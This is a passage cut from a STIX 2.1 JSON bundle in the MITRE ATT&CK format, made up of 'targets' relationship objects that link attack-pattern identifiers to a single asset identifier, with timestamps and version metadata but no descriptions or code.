"id": "relationship--c34f302d-9e22-4ced-81ad-44eb4cbfa1bd", "created": "2024-07-01T10:37:15.839667", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839669", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d3091ca-baa7-45bf-9cf8-e9824c91e257", "created": "2024-07-01T10:37:15.839676", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839678", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf0da0e4-e637-4be7-8852-080792d812ba", "created": "2024-07-01T10:37:15.839685", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839687", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5f2c4c2-ce62-47f3-96cc-5ce4be5fde46", "created": "2024-07-01T10:37:15.839694", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839696", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dd79efe9-bdce-49e3-be5f-cb163df043a9", "created": "2024-07-01T10:37:15.839703", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839705", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f7f1c94-8f9d-4f49-beaf-b1bcbeeab088", "created": "2024-07-01T10:37:15.839713", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839715", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--feedb8cf-628d-470b-9b01-3a8ae79814f9", "created": "2024-07-01T10:37:15.839722", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839724", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d6708a99-f1b0-4f22-95bb-7616a0601c8b", "created": "2024-07-01T10:37:15.839731", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839733", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--539dc832-d40d-4416-8ef7-8c51fb5ca9ee", "created": "2024-07-01T10:37:15.839740", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839742", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--10d48942-476d-4b12-8016-05ec19c42885", "created": "2024-07-01T10:37:15.839749", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839751", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--adec4150-4ba9-4112-9fd5-1889f98f0e05", "created": "2024-07-01T10:37:15.839758", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839760", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f13e357f-0818-4109-8eb2-ce25059ca134", "created": "2024-07-01T10:37:15.839767", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839769", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--584546b8-0ebe-465f-bfd1-77f495ff03b5", "created": "2024-07-01T10:37:15.839776", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839778", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a74937ea-09a3-4202-98c3-74f75a8955bb", "created": "2024-07-01T10:37:15.839785", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839787", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--745e3fc7-80ae-4db8-811d-b74470ebb672", "created": "2024-07-01T10:37:15.839794", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839796", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1dd2a19-3551-4187-a9e5-a524cc2eb9fe", "created": "2024-07-01T10:37:15.839804", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839806", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f509f13f-0fe2-40af-b88d-7cd5936d321b", "created": "2024-07-01T10:37:15.839813", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839815", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d787edb3-3a25-400a-982d-bb296640e476", "created": "2024-07-01T10:37:15.839822", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839824", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e8c68e82-e030-46f2-b8cd-8c5ccb8fa318", "created": "2024-07-01T10:37:15.839831", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839833", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9e0abd5f-c293-474d-b751-f88a6c4a7b55", "created": "2024-07-01T10:37:15.839840", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839842", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c0ad2ff-95d3-4d23-915c-7da665e39eb0", "created": "2024-07-01T10:37:15.839849", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839851", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6042a7e1-48e6-41af-a280-c1708d0b9060", "created": "2024-07-01T10:37:15.839859", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839861", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--90fe40b3-2199-499a-9396-f33fc4673254", "created": "2024-07-01T10:37:15.839868", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839870", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--98f71766-6022-4a96-8182-42677d37585a", "created": "2024-07-01T10:37:15.839877", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839879", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa6e69ed-4546-444c-b655-2a697c42b30e", "created": "2024-07-01T10:37:15.839886", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839888", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ab874ee-2f2e-43d2-9dd8-d32334397997", "created": "2024-07-01T10:37:15.839895", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839897", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2c32afc8-64e4-4b97-9bed-0255ccec7204", "created": "2024-07-01T10:37:15.839904", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839906", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f452e91-b6a9-49ba-ad0e-a607c9c57291", "created": "2024-07-01T10:37:15.839913", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839915", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dc22e593-e950-4b89-9e30-05a2f86edb1b", "created": "2024-07-01T10:37:15.839922", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839924", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39cbb93b-5b5a-4d22-b8ec-476292ed6cea", "created": "2024-07-01T10:37:15.839932", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839934", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--61505400-5043-4142-9a7e-e011fea92654", "created": "2024-07-01T10:37:15.839941", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839943", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13068a47-1cbf-440a-a061-e617b477e987", "created": "2024-07-01T10:37:15.839950", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839952", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--37da7bbf-61e3-4220-affd-febec6a49c19", "created": "2024-07-01T10:37:15.839959", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839961", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4bc23a55-8ff5-473f-a576-629685217d62", "created": "2024-07-01T10:37:15.839968", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839970", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2505a2c8-e467-41c6-ac7d-3f45a8f42b7b", "created": "2024-07-01T10:37:15.839978", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839980", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a9f1c309-035a-4f1f-8bec-19cc9496fc1d", "created": "2024-07-01T10:37:15.839987", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839989", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ad3c6499-6851-4ab3-a6f3-5c35170ef9d7", "created": "2024-07-01T10:37:15.839996", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.839998", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f9693cf-02da-40df-93c5-1ae4b8cde80c", "created": "2024-07-01T10:37:15.840005", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840007", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ee2bf4e0-05a5-4f7c-b38d-0914adbe9407", "created": "2024-07-01T10:37:15.840014", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840016", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--70579972-0b28-468e-bfb5-6ee666937d34", "created": "2024-07-01T10:37:15.840023", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840025", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3c8f8d53-b15f-432a-b7e0-fc73cc6f100d", "created": "2024-07-01T10:37:15.840033", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840034", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6f41722-e770-4441-9a43-9dff00737e2e", "created": "2024-07-01T10:37:15.840042", "created_by_ref": 